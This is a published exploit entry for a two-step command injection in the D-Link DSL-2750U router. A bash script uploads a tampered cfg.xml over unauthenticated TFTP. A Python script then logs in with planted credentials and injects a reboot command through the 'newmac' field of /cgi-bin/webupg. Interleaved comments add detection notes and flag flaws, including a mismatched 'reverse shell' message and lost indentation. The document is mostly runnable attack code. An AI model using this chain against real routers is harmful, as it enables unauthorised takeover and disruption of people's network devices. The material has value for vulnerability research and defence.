Dlink DSL2750U Command Injection

2021-06-22T00:00:00
ID PACKETSTORM:163228
Type packetstorm
Reporter Mohammed Hadi
Modified 2021-06-22T00:00:00

Description

                                        
                                            `# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection  
# Date: 17-06-2021  
# Exploit Author: Mohammed Hadi (HadiMed)  
# Vendor Homepage: https://me.dlink.com/consumer  
# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16  
# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R*  
# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6)   
  
###   
  
#!/bin/bash  
  
# Exploit by HadiMed   
  
# Step 1 of the chain this advisory describes: the router's TFTP service
# accepts a replacement cfg.xml without authenticating the sender. The
# uploaded config carries the username/password that exploit.py (step 2,
# below) logs in with; it presumably takes effect once the router restarts,
# which is what the 180 s sleep further down waits for.
# Defender note: the observable artifact of this step is a TFTP write
# ("put cfg.xml") to the gateway from a LAN host -- an unexpected config
# import over TFTP is the thing to alert on and, where possible, to disable.
echo -ne "\n"  
echo "Exploiting Dlink DSL-2750u version 1.6"  
echo -ne "\n\n"  
  
# Sending the payload -- cfg.xml is expected in the current directory and the
# router at its default LAN address 192.168.1.1 (hard-coded). tftp's exit
# status is never checked, so the "uploaded Successfully" line below is
# printed whether or not the transfer worked.
echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1  
echo -ne "\n"  
  
echo "File uploaded Successfully"  
echo "Waiting for router to restart"  
  
sleep 180 # approximate time for router to restart (fixed delay; the device is not probed)   
  
# Step 2: the Python listing that follows (login + command injection).
python3 exploit.py  
  
###  
  
import requests   
  
# exploit.py -- step 2 of the chain: log in with the credentials the uploaded
# cfg.xml planted, then reach the command-injection sink.
#
# Defender notes, limited to what this listing shows:
#  * Sink: the "newmac" form field of POST /cgi-bin/webupg. The value sent
#    below is not a MAC address but a shell fragment (';' separators, ${IFS}
#    in place of a space), so the field is presumably handed to a shell
#    without validation -- the injection this advisory reports.
#  * Precondition: a session on /cgi-bin/webproc obtained with the planted
#    credentials; the session id is chosen by the client, not the device.
#  * Detection: a POST to /cgi-bin/webupg whose newmac value contains shell
#    metacharacters, preceded by a TFTP write of cfg.xml to the gateway.
#  * The indentation of this listing appears to have been lost in
#    extraction; the if/try/except bodies below are shown flush-left as
#    published, so which statements belong to which branch cannot be told
#    from the text alone.
#
# The captured login request that the first POST below reproduces
# (sessionid 634cdf91 in the capture, "deadbeef" in the script):
'''  
POST /cgi-bin/webproc HTTP/1.1  
Host: 192.168.1.1  
Content-Length: 175  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.1.1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.1.1/cgi-bin/webproc  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91  
Connection: close  
  
getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91   
'''  
  
# 1. Getting a session id  
  
# Username and password are the ones the author wrote into cfg.xml, which the
# TFTP step (see the shell script above) uploaded to the router.  
  
username = "pwned"  
password= "pwned"  
  
  
# The session id is client-chosen: the same arbitrary value ("deadbeef")
# appears in the Cookie header and in the ":sessionid" form field, and per
# the author the device accepts it as long as username/password are correct
# (the script treats a 302 from this POST as that confirmation).  
  
Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef"  
Contentty="application/x-www-form-urlencoded"  
Referer="http://192.168.1.1/cgi-bin/webproc"  
# Content-Length is the value from the capture above (175), set by hand rather
# than derived from the body this script actually encodes.  
Contentlen="175"   
  
# First request: log in and establish the client-chosen session id  
response = requests.post("http://192.168.1.1/cgi-bin/webproc",  
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }  
,   
data={ "getpage":"html/index.html",  
"errorpage":"html/main.html",  
"var:menu" : "setup",  
"var:page":"wizard",  
"obj-action":"auth",  
":username":username,  
":password":password,  
":action":"login",  
":sessionid":"deadbeef"  
}  
)  
  
  
# 2. The injection. Referer is switched to the webupg page, and the "name"/
# "newmac" pair mimics that page's MAC-change form.  
Referer = "http://192.168.1.1/cgi-bin/webupg"  
  
name = "mac"  
# Not a MAC address: a shell fragment that sleeps 10 s and reboots the device
# (the "Reboot" of the advisory title). ${IFS}, the shell's field-separator
# variable, stands in for the space so no literal whitespace is sent.  
cmd = "1;sleep${IFS}10;reboot;"  
  
# Hand-computed Content-Length (raw field lengths plus a constant); it is not
# derived from the URL-encoded body requests sends, so it need not match.  
Contentlen = str(len(name+cmd)+10)  
  
# A 302 from the login POST is taken to mean the session id was accepted.  
if response.status_code==302:  
# NOTE: the message mentions a reverse shell, but the command above only
# sleeps and reboots; the text does not match the payload in this listing.  
print("got sessionid=deadbeef !\n waiting for the reverse shell ...")   
  
# Access cgi-bin/webupg with the injected value. The near-zero timeout means
# the request is sent and immediately abandoned: the Timeout branch below is
# the expected path, and no response from the device is ever read.  
try :  
response = requests.post("http://192.168.1.1/cgi-bin/webupg",  
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }  
,data = {"name":name , "newmac":cmd} , timeout=0.0000000001  
  
)  
  
except requests.exceptions.Timeout :  
  
print("done router will restart in 20 sec")   
  
# Printed without checking device state; with the listing's indentation lost,
# whether this line sits inside the `if` above cannot be determined here.  
print("Device restarted!")  
`